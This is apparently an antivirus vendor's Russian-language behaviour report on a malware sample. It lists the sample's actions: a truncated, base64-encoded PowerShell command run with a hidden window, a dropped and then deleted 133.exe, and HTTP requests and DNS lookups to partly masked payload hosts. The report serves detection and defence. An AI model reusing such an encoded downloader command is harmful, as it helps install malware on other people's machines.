Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\133.exe
Удаляет следующие файлы
- %HOMEPATH%\133.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://me##nor.gr/docs/q75cvd/
- http://bn##ati.ir/8iujk/b0/
- http://da####somoy24.com/be53np0/IlLy/
UDP
- DNS ASK te###hint.com
- DNS ASK or#######onale.metodoinforma.it
- DNS ASK me##nor.gr
- DNS ASK bn##ati.ir
- DNS ASK bi#.ly
- DNS ASK da####somoy24.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)
